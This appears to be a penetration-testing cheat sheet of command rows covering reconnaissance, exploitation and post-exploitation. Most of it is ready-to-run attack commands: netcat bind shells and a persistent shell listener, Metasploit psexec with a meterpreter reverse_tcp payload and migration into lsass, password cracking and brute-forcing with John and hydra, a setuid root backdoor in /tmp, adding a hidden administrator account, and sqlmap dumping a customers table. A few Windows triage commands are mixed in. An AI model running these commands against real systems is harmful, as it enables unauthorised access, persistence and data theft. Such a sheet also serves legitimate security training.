nmap -A <target> --reason -o <file> |
nmap -p port(s) target --reason |
nmap -sV -p port(s) target --reason |
nmap -p <port> --script http-enum <target> |
scripts: |
http-enum, http-title, smb-os-discovery, smb-brute |
nc -lnvp 7777 |
create listener |
nc -nv <IP> <Port> |
connect |
nc -l nvp Port -e /bin/sh |
nc -lnvp Port -e cmd.exe |
while [ 1 ]; do echo "Started"; nc -lnp [port] -e /bin/sh; done |
set up persistent listener |
Wmic process list brief |
Wmic process where name="<process.exe>" list full |
Wmic process where processid="<PID>" list full |
Wmic process where processid="<PID>" get name,commandline,processid,parentprocessid |
Wmic process where name="<process.exe>" get name,commandline,processid,parentprocessid |
Wmic startup |
Regedit and Startup
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ |
Run, Runonce, RunonceEx |
sc query | more |
Windows services |
Tasklist /svc |
shows Process, PID, services |
Taskschd.msc |
task scheduler GUI |
schtasks | more |
CLI show scheduled tasks |
schtasks /delete /tn <taskname> |
Delete a scheduled task |
Lusrmgr.msc |
local users and groups GUI |
secpol.msc |
local security policy GUI |
check local policies, audit policy, audit logon events |
reg query <HKEY...> shows whats in the registry key
nslookup |
from Windows |
server <IP> |
ls -d target.tgt |
dig @<IP> target.tgt -t AXFR |
from Unix |
attempt a zone transfer from a Windows System
search keyword type:exploit |
use exploit/windows/smb/psexec |
set SMBUser <admin_user> |
set SMBPass <admin_pass> |
set SMBDomain <windows domain> |
set PAYLOAD windows/meterpreter/reverse_tcp |
set LHOST |
set RHOST <target> |
migrate -N lsass.exe |
shell |
background |
route add <targetIP> <subnetMask> 1 |
pivot through session 1 when targeting <targetIP> |
John The Ripper
unshadow /etc/passwd /etc/shadow > /tmp/combined |
john /tmp/combined |
john <hashfile> (LANMAN Hash) |
john --format=NT <hashfile> (NT Hash) |
Delete john.pot when you want to restart a cracking session. otherwise, it starts where it left off
hydra -l <username> -p <password> ssh://<targetIP> |
hydra -l <username> -P <passwordList.txt> ssh://<targetIP> |
hydra -L <usernameList.txt -p <password> ssh://<targetIP> |
SETUID shells
find / -uid 0 -type f -perm -4000 2>/dev/null |
find files starting at root directory, owned by root, are a file type (not directory), and have SETUID bit set. send errors to /dev/null. |
cp /bin/sh /tmp/backdoor |
sudo chown root:root /tmp/backdoor |
sudo chmod 4755 /tmp/backdoor |
/tmp/backdoor -p |
find files starting at root directory, owned by root, are a file type (not directory), and have SETUID bit set. send errors to /dev/null.
Windows Net, SMBclient, SSH
net user /add <username> <password> |
net localgroup administrators /add <username> |
net user username /delete |
net use * \\target\C$ password /u:targetIP\username |
net use * /d /y |
smbclient -U username -L server -m SMB3 |
smbclient -U username //server/C$ -m SMB3 |
smbclient -U DOM\\username //server/C$ -m SMB3 |
ssh username@hostname |
scp username@hostname:/path/to/file ./ |
copy to local host |
scp file file username@hostname: |
copy file to remote host |
Alternate Data Streams
dir /r |
show ADS in CMD |
Get-Item -Path -Stream |
show ADS in Powershell |
lads C:\ /S |
search for ADS streams using LADS |
lads C:\ /S | findstr /V "Error 1921" |
filter out LADS errors |
more < file:streamName |
get ADS content in CMD |
Get-Content -Path filepath -Stream streamName |
get ADS content in Powershell |
wget and curl
wget <URL/filename.txt> |
download a file locally |
wget -qO- <URL/filename.txt> |
download and display file contents |
curl -iI <URL/filename.txt> |
display server header response |
curl -O filename.txt <URL/filename.txt> |
download a file locally |
curl --silent -b "cookiename=cookievalue" <URL/filename.txt> |
download and display file, suppressing progress, with specified cookie |
sqlmap -u 'URL/page¶m=1?param=2' |
always start with valid URL, in quotes |
sqlmap -u 'http://www[…]=1?param=2' --dbs |
enumerate databases |
sqlmap -u 'http://www[…]=1?param=2' -D dbname --tables |
enum tables in selected database dname |
sqlmap -u 'http://www[…]=1?param=2' -D dbname -T customers --dump |
retrieve all rows in the customers dbname.customers table |